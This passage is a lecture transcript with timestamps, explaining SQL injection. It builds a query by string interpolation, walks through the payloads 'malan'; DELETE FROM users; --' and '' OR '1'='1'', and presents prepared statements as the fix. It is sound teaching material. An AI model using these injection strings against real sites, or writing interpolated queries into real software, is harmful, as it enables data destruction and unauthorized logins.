748 00:40:00,940 --> 00:40:03,310 Now, consider this to be pseudo code of sorts 749 00:40:03,310 --> 00:40:08,470 because I'm mixing some SQL syntax with some Python syntax in this case 750 00:40:08,470 --> 00:40:12,520 because it turns out that when you're using this language, SQL or SQL, 751 00:40:12,520 --> 00:40:15,910 you typically use it in combination with some other language, 752 00:40:15,910 --> 00:40:19,420 be it Python, or PHP, or Java, or something else. 753 00:40:19,420 --> 00:40:21,370 And you use that other language typically 754 00:40:21,370 --> 00:40:26,600 to construct queries dynamically based on values that humans have typed in. 755 00:40:26,600 --> 00:40:29,140 So for instance, if you're logging into a website 756 00:40:29,140 --> 00:40:31,480 and you type in your username and hit Enter, 757 00:40:31,480 --> 00:40:36,280 very often, if that website is implemented in Python, or PHP, or Java, 758 00:40:36,280 --> 00:40:41,440 it might use one of those languages to construct a SQL query that is then 759 00:40:41,440 --> 00:40:44,800 actually sent to the database to look up that specific user who's 760 00:40:44,800 --> 00:40:46,070 trying to log in. 761 00:40:46,070 --> 00:40:49,450 So what I have here then is mostly SQL syntax, 762 00:40:49,450 --> 00:40:54,070 except for in these curly braces some Python-specific syntax. 763 00:40:54,070 --> 00:40:57,580 And what this curly brace with username inside of it represents 764 00:40:57,580 --> 00:41:02,320 is hey, server, plug in whatever the human typed in as their username 765 00:41:02,320 --> 00:41:03,920 into that part of the string. 766 00:41:03,920 --> 00:41:06,460 So the curly braces and the word username 767 00:41:06,460 --> 00:41:09,460 should be replaced with literally something like Malan 768 00:41:09,460 --> 00:41:12,100 if that is the user who's trying to log in. 769 00:41:12,100 --> 00:41:15,850 And that will then resulting-- the resulting code will 770 00:41:15,850 --> 00:41:17,950 be sent to the database to select everything 771 00:41:17,950 --> 00:41:21,850 we know from the user's table, so to speak, in that database 772 00:41:21,850 --> 00:41:23,960 about that particular username. 773 00:41:23,960 --> 00:41:26,360 So what could potentially go wrong here? 774 00:41:26,360 --> 00:41:30,520 Well, it all has to do with, again, trusting input from the user. 775 00:41:30,520 --> 00:41:32,560 And that should now be emerging as a theme. 776 00:41:32,560 --> 00:41:37,797 You should generally always mistrust input that comes from users. 777 00:41:37,797 --> 00:41:39,130 You should do something with it. 778 00:41:39,130 --> 00:41:43,000 But you should sanitize it or scrub it in such a way, 779 00:41:43,000 --> 00:41:46,120 that any potentially dangerous characters are somehow escaped. 780 00:41:46,120 --> 00:41:49,990 And that's exactly what the solution was to those cross-site scripting 781 00:41:49,990 --> 00:41:53,440 attacks, whereby, so long as we escaped the user's input 782 00:41:53,440 --> 00:41:56,860 and changed the less than sign, and the greater than sign, and maybe 783 00:41:56,860 --> 00:42:00,580 some other symbols as well to the equivalent character escapes, 784 00:42:00,580 --> 00:42:02,090 all was well. 785 00:42:02,090 --> 00:42:04,870 So here, too, is an example now in the context of databases 786 00:42:04,870 --> 00:42:09,340 where a bit of paranoia will go a long way to keeping your software secure. 787 00:42:09,340 --> 00:42:10,150 Why? 
788 00:42:10,150 --> 00:42:13,420 Well, suppose that my username is, indeed, Malan, 789 00:42:13,420 --> 00:42:16,180 but suppose that's not what I type into the website 790 00:42:16,180 --> 00:42:17,900 when trying to log in, for instance. 791 00:42:17,900 --> 00:42:21,010 So instead of typing just my username, suppose 792 00:42:21,010 --> 00:42:24,460 I am suspicious as the adversarially that this website is probably 793 00:42:24,460 --> 00:42:25,540 using a database. 794 00:42:25,540 --> 00:42:28,210 And that database is probably using this language, SQL. 795 00:42:28,210 --> 00:42:32,380 So what could I do to kind of mess with the owners of this website 796 00:42:32,380 --> 00:42:36,670 and try to trick their database into executing my code 797 00:42:36,670 --> 00:42:38,510 and not just their own? 798 00:42:38,510 --> 00:42:40,180 How do I inject code of my own? 799 00:42:40,180 --> 00:42:43,180 Well, instead of Malan, let me a little cryptically type 800 00:42:43,180 --> 00:42:46,690 this in to the website where I'm prompted for my username. 801 00:42:46,690 --> 00:42:48,250 Now, this does look cryptic. 802 00:42:48,250 --> 00:42:50,200 And odds are an adversary is not going to know 803 00:42:50,200 --> 00:42:55,330 exactly what to type the very first time they try to hack into a server. 804 00:42:55,330 --> 00:42:58,330 Rather, it's through trial and error very often 805 00:42:58,330 --> 00:43:01,120 that an adversary might eventually realize, ah, 806 00:43:01,120 --> 00:43:04,150 this is what I could probably type into that website 807 00:43:04,150 --> 00:43:06,520 to inject some code of my own. 808 00:43:06,520 --> 00:43:08,140 So to be clear, what have I typed? 809 00:43:08,140 --> 00:43:12,910 I've still typed my username, M-A-L-A-N, but then I've typed a single quote, 810 00:43:12,910 --> 00:43:18,070 and then a semicolon, and then DELETE FROM users, and then another semicolon, 811 00:43:18,070 --> 00:43:19,300 and then a dash, dash. 812 00:43:19,300 --> 00:43:22,680 Now, if you don't know SQL-- and you're not expected to know SQL for this 813 00:43:22,680 --> 00:43:23,250 cause-- 814 00:43:23,250 --> 00:43:25,410 this looks weird, probably. 815 00:43:25,410 --> 00:43:29,250 But each of these symbols, each of these punctuation symbols, in particular, 816 00:43:29,250 --> 00:43:33,100 means something specific and serves a particular purpose. 817 00:43:33,100 --> 00:43:34,510 Now, what might that be? 818 00:43:34,510 --> 00:43:36,390 Well, me go back to the original query. 819 00:43:36,390 --> 00:43:41,280 And now let me assume that in yellow here, the curly braces with username, 820 00:43:41,280 --> 00:43:43,440 is where my username is supposed to go. 821 00:43:43,440 --> 00:43:45,510 And my username is supposed to be Malan. 822 00:43:45,510 --> 00:43:49,020 But what if I type in that long sequence of cryptic text? 823 00:43:49,020 --> 00:43:51,360 Here's what's going to happen on the server. 824 00:43:51,360 --> 00:43:54,870 Because it's using a language like Python, or PHP, or Java, 825 00:43:54,870 --> 00:43:58,530 this yellow value is going to be "interpolated," 826 00:43:58,530 --> 00:44:01,750 that is, replaced with whatever the human typed in. 827 00:44:01,750 --> 00:44:02,490 So let's do that. 828 00:44:02,490 --> 00:44:06,360 Let me paste in what I, the adversary, typed in. 829 00:44:06,360 --> 00:44:09,700 And notice I've kept yellow the user's input. 
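Spelled out in plain text, and continuing the hypothetical sketch from earlier, the string that actually reaches the database would now be roughly this:

    malicious_input = "malan'; DELETE FROM users; --"
    query = f"SELECT * FROM users WHERE username = '{malicious_input}'"
    print(query)
    # SELECT * FROM users WHERE username = 'malan'; DELETE FROM users; --'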
830 00:44:09,700 --> 00:44:12,810 So everything in white is still the part of the SQL query 831 00:44:12,810 --> 00:44:16,290 that the designers of the database came up with in advance. 832 00:44:16,290 --> 00:44:20,130 But everything in yellow is what came from a form on the web, an adversary, 833 00:44:20,130 --> 00:44:21,100 in my case. 834 00:44:21,100 --> 00:44:23,040 And this looks a little cryptic still. 835 00:44:23,040 --> 00:44:26,400 But even if you've never seen SQL before, 836 00:44:26,400 --> 00:44:29,190 you might have an intuition for what could go wrong. 837 00:44:29,190 --> 00:44:34,380 Because I, the adversary, typed not only Malan, but a single quote here, 838 00:44:34,380 --> 00:44:38,070 notice that, oh, my goodness, that perfectly lines up 839 00:44:38,070 --> 00:44:42,960 with the single quote that the database designer used in their query. 840 00:44:42,960 --> 00:44:45,960 And so even though this white quote is meant 841 00:44:45,960 --> 00:44:49,620 to be closed by this white quote way over here, 842 00:44:49,620 --> 00:44:52,350 notice that grammatically in this language, 843 00:44:52,350 --> 00:44:56,280 not to mention in English and other human languages, this single quote here 844 00:44:56,280 --> 00:44:58,950 or apostrophe, because it comes first, will 845 00:44:58,950 --> 00:45:04,620 be presumed to close this single quote or this apostrophe here. 846 00:45:04,620 --> 00:45:08,160 The semicolon, it turns out in this language, SQL, ends a thought. 847 00:45:08,160 --> 00:45:09,690 It's like a period in English. 848 00:45:09,690 --> 00:45:14,080 And so anything after a semicolon is like a new command altogether. 849 00:45:14,080 --> 00:45:18,330 So notice that DELETE FROM users semicolon is like a second command that 850 00:45:18,330 --> 00:45:20,400 came entirely from me, the adversary. 851 00:45:20,400 --> 00:45:23,520 And then dash, dash, it turns out-- and this is very clever. 852 00:45:23,520 --> 00:45:27,720 Dash, dash a lot of versions of SQL represents a "comment." 853 00:45:27,720 --> 00:45:32,280 And a comment in a programming language means ignore everything after this 854 00:45:32,280 --> 00:45:36,720 because a problem right now is that single quote, that apostrophe, 855 00:45:36,720 --> 00:45:39,840 was meant to surround the user's username. 856 00:45:39,840 --> 00:45:43,230 But because I, the adversary, already gave you a single quote 857 00:45:43,230 --> 00:45:47,230 to use accidentally as closing this thought, 858 00:45:47,230 --> 00:45:50,200 well, we don't need this single quote at the very end anymore. 859 00:45:50,200 --> 00:45:53,860 So this is why the adversary, or me in this story is doing dash, dash. 860 00:45:53,860 --> 00:45:56,820 That's just going to tell the server, OK, ignore everything 861 00:45:56,820 --> 00:46:01,710 after that, including the single quote that we do not need grammatically. 862 00:46:01,710 --> 00:46:03,150 So let me reformat this a bit. 863 00:46:03,150 --> 00:46:06,113 I'm going to go ahead and add some new lines, some white space, just 864 00:46:06,113 --> 00:46:07,530 to make it a little more readable. 865 00:46:07,530 --> 00:46:13,260 What you see on the screen here right now is equivalent to this. 866 00:46:13,260 --> 00:46:16,410 Notice that I've moved the Delete command to a own line 867 00:46:16,410 --> 00:46:17,760 just for readability's sake. 
868 00:46:17,760 --> 00:46:21,300 I've gotten rid of the final apostrophe, the single quote, 869 00:46:21,300 --> 00:46:23,820 because it was after a comment, which means by design, 870 00:46:23,820 --> 00:46:25,090 it's meant to be ignored. 871 00:46:25,090 --> 00:46:29,640 So what I have done as the adversary because I presumed, or inferred, 872 00:46:29,640 --> 00:46:33,330 or figured out that this website is using single quotes and they're just 873 00:46:33,330 --> 00:46:37,290 blindly interpolating, that is, replacing those curly braces 874 00:46:37,290 --> 00:46:41,790 and username with literally anything I type in, I can trick the server 875 00:46:41,790 --> 00:46:45,990 into finishing this first command by saying SELECT * FROM users WHERE 876 00:46:45,990 --> 00:46:48,360 username='malan';. 877 00:46:48,360 --> 00:46:51,630 And worse, I can trick this particular database 878 00:46:51,630 --> 00:46:55,710 into executing a second SQL command, which even if again, you've never seen 879 00:46:55,710 --> 00:46:58,490 SQL, deleting is probably a bad thing. 880 00:46:58,490 --> 00:47:00,240 It's probably a destructive thing that you 881 00:47:00,240 --> 00:47:02,700 don't want some random adversary on the internet being 882 00:47:02,700 --> 00:47:04,810 able to do on your server. 883 00:47:04,810 --> 00:47:07,300 So what's the goal of these lines here? 884 00:47:07,300 --> 00:47:09,600 Well, the original intent of the first query, 885 00:47:09,600 --> 00:47:13,047 presumably, I claimed, was just to search for the user in the database, 886 00:47:13,047 --> 00:47:14,130 so that they could log in. 887 00:47:14,130 --> 00:47:16,770 So when I type in Malan and hit Enter, I am somehow 888 00:47:16,770 --> 00:47:20,340 able to log in, probably, after typing also a password, maybe 889 00:47:20,340 --> 00:47:22,200 a two-factor code or the like. 890 00:47:22,200 --> 00:47:25,950 But SELECT * users WHERE username=malan, fine. 891 00:47:25,950 --> 00:47:28,110 That's probably going to retrieve the information 892 00:47:28,110 --> 00:47:29,640 that it was supposed to retrieve. 893 00:47:29,640 --> 00:47:33,000 The dangerous part here is that I tricked this server 894 00:47:33,000 --> 00:47:35,230 into executing a second command. 895 00:47:35,230 --> 00:47:36,780 And this one looks destructive. 896 00:47:36,780 --> 00:47:41,160 DELETE FROM user; means delete all of the users from the system. 897 00:47:41,160 --> 00:47:44,610 So it doesn't help the adversary in this case get into the system 898 00:47:44,610 --> 00:47:49,590 or do anything with the Malan account other than delete it and literally 899 00:47:49,590 --> 00:47:52,240 every other account in the system. 900 00:47:52,240 --> 00:47:53,710 So this is bad. 901 00:47:53,710 --> 00:47:59,190 This is representative of a SQL injection, whereby I, the adversary, 902 00:47:59,190 --> 00:48:03,510 wrote code that you, the designer of this database, accidentally, 903 00:48:03,510 --> 00:48:08,100 naively treated as part of your own commands. 904 00:48:08,100 --> 00:48:11,710 So how else could things go wrong? 905 00:48:11,710 --> 00:48:14,790 Well, not only could you do something destructive like deleting data 906 00:48:14,790 --> 00:48:15,540 from the database. 
907 00:48:15,540 --> 00:48:18,210 But suppose that the user is prompted at the same time 908 00:48:18,210 --> 00:48:20,820 for a username and a password now in this story, 909 00:48:20,820 --> 00:48:25,240 and suppose, therefore, that the query in the software is this, 910 00:48:25,240 --> 00:48:28,210 SELECT * FROM users WHERE username equals, 911 00:48:28,210 --> 00:48:30,970 quote, unquote, "username" in curly braces, but one more 912 00:48:30,970 --> 00:48:35,440 phrase, AND password equals, quote, unquote, 913 00:48:35,440 --> 00:48:39,340 "password" based on whatever the human typed in as their password. 914 00:48:39,340 --> 00:48:42,520 So again, to be clear, in this story, the user 915 00:48:42,520 --> 00:48:44,560 is prompted for a username and a password. 916 00:48:44,560 --> 00:48:48,910 And the SQL command that's going to use those two values looks like this. 917 00:48:48,910 --> 00:48:52,720 But here, too, we're setting the stage for an injection attack. 918 00:48:52,720 --> 00:48:53,260 Why? 919 00:48:53,260 --> 00:48:56,350 Because based on these placeholders with the curly braces 920 00:48:56,350 --> 00:48:58,960 around username and password, it looks like we're just 921 00:48:58,960 --> 00:49:04,180 going to blindly plug in to this command exactly what it 922 00:49:04,180 --> 00:49:08,420 is the human had typed for their username and password respectively. 923 00:49:08,420 --> 00:49:11,540 So what could a more sophisticated adversary now do? 924 00:49:11,540 --> 00:49:14,140 Well, maybe instead of typing in Malan and then 925 00:49:14,140 --> 00:49:17,692 whatever Malan's actual password is, suppose that they just 926 00:49:17,692 --> 00:49:20,650 want to get into someone's account, maybe Malan's, maybe someone else's 927 00:49:20,650 --> 00:49:21,490 altogether? 928 00:49:21,490 --> 00:49:27,360 What if the adversary doesn't just type Malan, not to mention Malan's password, 929 00:49:27,360 --> 00:49:32,820 but what if they type in this specifically for Malan's password? 930 00:49:32,820 --> 00:49:33,770 Now, this is weird. 931 00:49:33,770 --> 00:49:36,180 And I'll tell you now, this is not, in fact, my password. 932 00:49:36,180 --> 00:49:38,180 But what has the adversary typed in? 933 00:49:38,180 --> 00:49:42,050 A single quote, the word or, then another single quote 934 00:49:42,050 --> 00:49:45,710 with a one and a single quote equals a single quote and a one. 935 00:49:45,710 --> 00:49:48,080 So this looks very, very weird. 936 00:49:48,080 --> 00:49:49,590 But let's see what happens. 937 00:49:49,590 --> 00:49:51,620 And again, most adversaries wouldn't figure this 938 00:49:51,620 --> 00:49:53,480 out the first time they try. 939 00:49:53,480 --> 00:49:56,930 Odds are, they'd be trying a whole bunch of techniques and heuristics 940 00:49:56,930 --> 00:49:59,210 to figure out what might actually work for them. 941 00:49:59,210 --> 00:50:02,210 So we're fast forwarding to the end of the story where the adversary has 942 00:50:02,210 --> 00:50:07,280 figured out that this weird sequence of characters can hack into this server 943 00:50:07,280 --> 00:50:10,560 by tricking it into executing code that wasn't intended. 
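Under the same hypothetical string-formatting approach, the login query and the adversary's two inputs would combine roughly like this:

    username = "malan"
    password = "' OR '1'='1"
    query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"
    print(query)
    # SELECT * FROM users WHERE username = 'malan' AND password = '' OR '1'='1'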
944 00:50:10,560 --> 00:50:14,180 So here again in yellow is exactly what the adversary has typed in, 945 00:50:14,180 --> 00:50:16,940 Malan, which may very well be a legitimate username, 946 00:50:16,940 --> 00:50:21,560 but then for the password in yellow, single quote or single quote, 947 00:50:21,560 --> 00:50:24,500 one single quote equals single quote one. 948 00:50:24,500 --> 00:50:27,020 And based on our previous example, you can, perhaps, 949 00:50:27,020 --> 00:50:29,120 see what's starting to go on here. 950 00:50:29,120 --> 00:50:32,120 We've finished the Malan thought naturally. 951 00:50:32,120 --> 00:50:35,030 We didn't type anything malicious for the username this time. 952 00:50:35,030 --> 00:50:38,450 But we did type something seemingly malicious for the password. 953 00:50:38,450 --> 00:50:41,660 And the first single quote in yellow quickly 954 00:50:41,660 --> 00:50:44,990 finishes the password thought, quote, unquote, nothing in between. 955 00:50:44,990 --> 00:50:49,040 But then we're saying or, quote, unquote, one equals, quote, one. 956 00:50:49,040 --> 00:50:49,670 Why? 957 00:50:49,670 --> 00:50:52,400 Well, the adversary in this case kind of figured out, or knew, 958 00:50:52,400 --> 00:50:57,300 or guessed that the SQL command ends with a single quote itself. 959 00:50:57,300 --> 00:51:00,200 So the whole point here is even though this, too, probably looks 960 00:51:00,200 --> 00:51:04,790 very cryptic is that grammatically, what the adversary has typed 961 00:51:04,790 --> 00:51:08,390 in not only perfectly aligns with the username field, 962 00:51:08,390 --> 00:51:10,400 because it's just Malan, nothing special there, 963 00:51:10,400 --> 00:51:13,760 but very cleverly, the adversary has finished 964 00:51:13,760 --> 00:51:16,910 the thought of this single quote and also finished 965 00:51:16,910 --> 00:51:18,840 the thought of this single quote. 966 00:51:18,840 --> 00:51:21,890 So we've made everything balanced, just like you would not only in SQL, 967 00:51:21,890 --> 00:51:23,720 but in a language like English. 968 00:51:23,720 --> 00:51:25,700 So let me go ahead and clean this up a little 969 00:51:25,700 --> 00:51:28,920 bit too to make clear why this is dangerous. 970 00:51:28,920 --> 00:51:31,970 This command now, once formed by the server, 971 00:51:31,970 --> 00:51:35,022 based on that adversary's input, is really the same as this. 972 00:51:35,022 --> 00:51:37,730 And I'm just going to add, again, a new line and some white space 973 00:51:37,730 --> 00:51:40,170 just to help us wrap our minds around what's going on. 974 00:51:40,170 --> 00:51:42,650 So I've just moved the or line to the bottom. 975 00:51:42,650 --> 00:51:45,440 And just like in math class years ago, let 976 00:51:45,440 --> 00:51:47,870 me go ahead and put parentheses around things here 977 00:51:47,870 --> 00:51:52,580 that makes clear what the precedence is of things like and and or. 978 00:51:52,580 --> 00:51:55,070 It turns out that and, like multiplication, 979 00:51:55,070 --> 00:51:56,667 binds at a higher precedence. 980 00:51:56,667 --> 00:51:57,500 It's more important. 981 00:51:57,500 --> 00:51:58,792 You're supposed to do it first. 982 00:51:58,792 --> 00:52:02,000 So I'm going to add parentheses now to this first expression. 983 00:52:02,000 --> 00:52:03,350 They're not strictly necessary. 984 00:52:03,350 --> 00:52:04,253 They're implied. 
985 00:52:04,253 --> 00:52:06,920 I'm just making them explicit now to show you, just like in math 986 00:52:06,920 --> 00:52:09,210 class, the order of operations. 987 00:52:09,210 --> 00:52:10,590 Now, what does this mean? 988 00:52:10,590 --> 00:52:13,680 This means that the database is going to say, SELECT * FROM users-- 989 00:52:13,680 --> 00:52:15,500 so select everything from the users table-- 990 00:52:15,500 --> 00:52:20,480 WHERE the username is 'malan' and the password is quote unquote. 991 00:52:20,480 --> 00:52:22,580 Now, that is probably not my password. 992 00:52:22,580 --> 00:52:24,560 My password is definitely not nothing. 993 00:52:24,560 --> 00:52:25,730 It's not empty. 994 00:52:25,730 --> 00:52:27,350 But that doesn't matter now. 995 00:52:27,350 --> 00:52:28,040 Why? 996 00:52:28,040 --> 00:52:33,650 Because even if this first clause, WHERE username = 'malan' and password = quote 997 00:52:33,650 --> 00:52:37,490 unquote-- even if that doesn't find anyone in the database with a username 998 00:52:37,490 --> 00:52:41,060 of 'malan' and a password of quote unquote, it doesn't matter, 999 00:52:41,060 --> 00:52:44,690 because we've tricked the database command into including an OR, 1000 00:52:44,690 --> 00:52:48,050 which is so stupid that it's always true-- 1001 00:52:48,050 --> 00:52:49,970 OR '1' = '1'. 1002 00:52:49,970 --> 00:52:55,580 Well, 1 always equals 1, which means that now, logically, this query is 1003 00:52:55,580 --> 00:52:59,690 going to return everything we know about users from the database. 1004 00:52:59,690 --> 00:53:01,290 And why is this problematic? 1005 00:53:01,290 --> 00:53:04,880 Well, when you're logging users into a database-- logging users into a website 1006 00:53:04,880 --> 00:53:08,210 or application, you're typically searching for them in the database. 1007 00:53:08,210 --> 00:53:11,090 And typically, if you get back one or more users, 1008 00:53:11,090 --> 00:53:14,660 you're going to assume that the very first user is the one that you want. 1009 00:53:14,660 --> 00:53:17,060 And maybe in this case, it's Malan, but it's also 1010 00:53:17,060 --> 00:53:21,800 very common in servers for the very first user that was created to be you, 1011 00:53:21,800 --> 00:53:23,240 the person that designed the site. 1012 00:53:23,240 --> 00:53:25,820 And you probably have administrative privileges-- 1013 00:53:25,820 --> 00:53:28,290 that is, access over everything in this system. 1014 00:53:28,290 --> 00:53:32,040 And so if a query like this is returning all of the users, 1015 00:53:32,040 --> 00:53:36,290 including you as the very first one, if there's additional code in the system 1016 00:53:36,290 --> 00:53:40,310 that we won't put on the screen here or bother hypothesizing about, 1017 00:53:40,310 --> 00:53:44,180 it means that you could be now letting the adversary 1018 00:53:44,180 --> 00:53:47,810 log in maybe as Malan, but worse, maybe as you, 1019 00:53:47,810 --> 00:53:51,050 all because you trusted user input. 1020 00:53:51,050 --> 00:53:54,620 But you should never trust that your users, if called Malan, 1021 00:53:54,620 --> 00:53:56,240 are going to type in just 'malan'. 1022 00:53:56,240 --> 00:53:59,540 You should always assume that there's someone out there, very annoyingly, 1023 00:53:59,540 --> 00:54:03,890 very maliciously, that's going to try using some single quotes, 1024 00:54:03,890 --> 00:54:08,660 some semicolons-- or in HTML, we saw a less-than sign or greater-than sign.
1025 00:54:08,660 --> 00:54:11,210 You should always expect that someone on the internet 1026 00:54:11,210 --> 00:54:15,500 will have enough time and interest in hacking your website or application 1027 00:54:15,500 --> 00:54:19,080 that this might indeed happen to you and your software. 1028 00:54:19,080 --> 00:54:20,900 So what's the solution, then? 1029 00:54:20,900 --> 00:54:25,062 How do you avoid a query that's equivalent ultimately to this-- 1030 00:54:25,062 --> 00:54:27,020 because if there's no 'malan' with no password, 1031 00:54:27,020 --> 00:54:30,680 it's still the same as asking for WHERE '1' = '1', which is anything. 1032 00:54:30,680 --> 00:54:32,510 And to be clear, I didn't have to use 1. 1033 00:54:32,510 --> 00:54:35,210 I could have used 2 or 3 or 4. 1034 00:54:35,210 --> 00:54:37,865 I could have used "cat" or "dog" or anything else. 1035 00:54:37,865 --> 00:54:40,490 So long as the thing on the left equals the thing on the right, 1036 00:54:40,490 --> 00:54:44,150 and I type that into the application, the same thing 1037 00:54:44,150 --> 00:54:47,090 would certainly equal itself, is the point here, 1038 00:54:47,090 --> 00:54:49,820 and 1 is just the simplest thing we could think of. 1039 00:54:49,820 --> 00:54:54,840 So what is the solution here, to SQL injection attack specifically? 1040 00:54:54,840 --> 00:54:58,370 Well, it's very similar in spirit to the notion of character escapes. 1041 00:54:58,370 --> 00:55:01,940 But in the world of SQL, there tend to be standard ways 1042 00:55:01,940 --> 00:55:04,130 of escaping dangerous characters. 1043 00:55:04,130 --> 00:55:05,540 You don't have to do it yourself. 1044 00:55:05,540 --> 00:55:09,020 And much like security in general, with encryption specifically, 1045 00:55:09,020 --> 00:55:13,160 you probably should not be writing code yourself to solve problems 1046 00:55:13,160 --> 00:55:15,950 like these that hundreds, thousands, millions of people 1047 00:55:15,950 --> 00:55:19,890 before you have already had to deal with and have probably solved correctly. 1048 00:55:19,890 --> 00:55:23,900 Do not reinvent wheels when you don't need to in the context of security. 1049 00:55:23,900 --> 00:55:27,650 So this is to say, in the world of databases, most databases support 1050 00:55:27,650 --> 00:55:32,060 what are called prepared statements, which is a fancy way of saying that you 1051 00:55:32,060 --> 00:55:34,760 provide the code for your SQL query. 1052 00:55:34,760 --> 00:55:38,780 You provide placeholders for wherever you want user input. 1053 00:55:38,780 --> 00:55:44,690 But let the database itself replace or interpolate those placeholders 1054 00:55:44,690 --> 00:55:46,770 with the user's actual input. 1055 00:55:46,770 --> 00:55:50,330 And let the database handle escaping anything dangerous. 1056 00:55:50,330 --> 00:55:54,350 And we've seen that things are dangerous, like apostrophes thus far. 1057 00:55:54,350 --> 00:55:59,390 So, for instance, instead of writing a single apostrophe-- and this 1058 00:55:59,390 --> 00:56:00,560 is weird, admittedly. 1059 00:56:00,560 --> 00:56:05,030 In the world of SQL, the way you typically escape an apostrophe 1060 00:56:05,030 --> 00:56:06,170 is not like HTML. 1061 00:56:06,170 --> 00:56:09,800 You don't do &apos semicolon. 1062 00:56:09,800 --> 00:56:13,580 You don't, like in some languages, put a backslash in front of it, typically. 
1063 00:56:13,580 --> 00:56:18,650 The way, weirdly, you escape a single quote or an apostrophe in SQL 1064 00:56:18,650 --> 00:56:22,760 is very often by putting two of them in a row. 1065 00:56:22,760 --> 00:56:23,810 So why? 1066 00:56:23,810 --> 00:56:25,470 We'll defer that to another day. 1067 00:56:25,470 --> 00:56:27,140 But this is just the convention. 1068 00:56:27,140 --> 00:56:29,450 Now, this means that you could write code that changes 1069 00:56:29,450 --> 00:56:31,520 any single quote to two single quotes. 1070 00:56:31,520 --> 00:56:33,350 But again, don't bother doing that. 1071 00:56:33,350 --> 00:56:35,870 Use functionality that comes with the database 1072 00:56:35,870 --> 00:56:37,530 or whatever library you're using. 1073 00:56:37,530 --> 00:56:40,730 So, for instance, if we go back to that very first query that 1074 00:56:40,730 --> 00:56:45,590 was vulnerable to being injected with something like, DELETE FROM users, 1075 00:56:45,590 --> 00:56:47,130 what if we now do this? 1076 00:56:47,130 --> 00:56:50,630 Let's change our Python-based placeholder, using 1077 00:56:50,630 --> 00:56:54,800 curly braces in yellow here, and let's change that and get rid of the quotes 1078 00:56:54,800 --> 00:56:56,240 and just put a question mark. 1079 00:56:56,240 --> 00:56:59,575 This is one of the common conventions in prepared statements, where 1080 00:56:59,575 --> 00:57:02,450 you put a question mark not because you don't know what to put there, 1081 00:57:02,450 --> 00:57:05,630 but because you want the database to replace that question 1082 00:57:05,630 --> 00:57:08,360 mark with a user's own input. 1083 00:57:08,360 --> 00:57:09,600 Then what happens? 1084 00:57:09,600 --> 00:57:13,160 Well, if the user types in that dangerous command 1085 00:57:13,160 --> 00:57:16,890 with the DELETE inside of it, notice what happens. 1086 00:57:16,890 --> 00:57:18,650 Here's the single quote. 1087 00:57:18,650 --> 00:57:20,330 Here's the close single quote. 1088 00:57:20,330 --> 00:57:23,630 And the database has given that to you automatically. 1089 00:57:23,630 --> 00:57:26,870 The prepared statement adds those single quotes for you. 1090 00:57:26,870 --> 00:57:29,450 Notice that even though I, the adversary, 1091 00:57:29,450 --> 00:57:33,980 only typed in 'malan' single quote semicolon, 1092 00:57:33,980 --> 00:57:38,630 the prepared statement has gone ahead and escaped a single quote 1093 00:57:38,630 --> 00:57:41,610 or apostrophe with two of them instead. 1094 00:57:41,610 --> 00:57:44,600 And nothing else here thereafter is actually too worrisome. 1095 00:57:44,600 --> 00:57:48,570 That alone is sufficient to solve the problem. 1096 00:57:48,570 --> 00:57:51,530 Now, this looks a little weird, right, because it kind of 1097 00:57:51,530 --> 00:57:55,110 looks like, logically, well, you still have this quote and this quote, 1098 00:57:55,110 --> 00:57:58,460 which line up, and you still have this quote and this quote, which line up. 1099 00:57:58,460 --> 00:58:01,460 So it looks like we haven't really fundamentally solved the problem, 1100 00:58:01,460 --> 00:58:02,370 but we have. 1101 00:58:02,370 --> 00:58:06,770 It turns out, in SQL databases, anytime they see two single quotes back 1102 00:58:06,770 --> 00:58:09,110 to back, they don't try to pair them with something 1103 00:58:09,110 --> 00:58:10,910 to the left or something to the right. 1104 00:58:10,910 --> 00:58:16,140 They just treat it as one special escape sequence, so to speak. 
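Here is a minimal sketch of that idea using Python's sqlite3 module, which supports ? placeholders; the table and columns are hypothetical, other database libraries offer equivalent mechanisms, and in a real system you would of course store password hashes rather than passwords:

    import sqlite3

    def find_user_safe(connection, username, password):
        # The ? placeholders are filled in by the database driver itself,
        # so a stray apostrophe in the input is treated as data,
        # not as SQL syntax.
        return connection.execute(
            "SELECT * FROM users WHERE username = ? AND password = ?",
            (username, password),
        ).fetchall()

    # Even the malicious "password" from before matches no one and injects nothing.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    print(find_user_safe(conn, "malan", "' OR '1'='1"))  # prints []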
1105 00:58:16,140 --> 00:58:18,030 So that would then fix this query. 1106 00:58:18,030 --> 00:58:21,020 And if we go back to the second query, which had two placeholders, 1107 00:58:21,020 --> 00:58:23,570 [? username ?] and [? password ?] using this Python syntax, 1108 00:58:23,570 --> 00:58:26,480 let me go ahead and change that to prepared statement syntax using, 1109 00:58:26,480 --> 00:58:30,440 in this case, question marks without quotes and trust that the database 1110 00:58:30,440 --> 00:58:34,400 itself will add any necessary quotes and escape any potentially dangerous 1111 00:58:34,400 --> 00:58:35,190 characters. 1112 00:58:35,190 --> 00:58:37,910 Now, what did the adversary type in in that second scenario? 1113 00:58:37,910 --> 00:58:41,000 Well, it was just innocuously 'malan', and so that comes back from 1114 00:58:41,000 --> 00:58:44,870 the prepared statement as being prepared with quote unquote on the outside. 1115 00:58:44,870 --> 00:58:45,890 No problem there. 1116 00:58:45,890 --> 00:58:51,080 But this other input from the user, from the adversary's password, which 1117 00:58:51,080 --> 00:58:53,490 was very cryptic with lots of single quotes-- 1118 00:58:53,490 --> 00:58:57,770 notice that every single quote in the adversary's so-called password 1119 00:58:57,770 --> 00:59:01,310 has been escaped so that the single quote here becomes two. 1120 00:59:01,310 --> 00:59:02,810 The single quote here becomes two. 1121 00:59:02,810 --> 00:59:04,010 The single quote here becomes two. 1122 00:59:04,010 --> 00:59:05,427 The single quote here becomes two. 1123 00:59:05,427 --> 00:59:09,830 And the prepared statement automatically adds a final single quote 1124 00:59:09,830 --> 00:59:10,920 at the very end. 1125 00:59:10,920 --> 00:59:14,900 But I've kept highlighted in yellow everything that represents the user's 1126 00:59:14,900 --> 00:59:18,200 input now that it's been properly escaped, because, again, 1127 00:59:18,200 --> 00:59:21,680 even though you might try mentally to pair this quote with this one, 1128 00:59:21,680 --> 00:59:23,670 this one with this one, this one with this one, 1129 00:59:23,670 --> 00:59:26,060 and so forth, that's not what the database does. 1130 00:59:26,060 --> 00:59:29,900 Whenever it sees, in this case, two apostrophes back to back, 1131 00:59:29,900 --> 00:59:32,880 they are treated as special escape sequences. 1132 00:59:32,880 --> 00:59:37,040 And so the only quotes that ultimately are treated as lining up 1133 00:59:37,040 --> 00:59:42,258 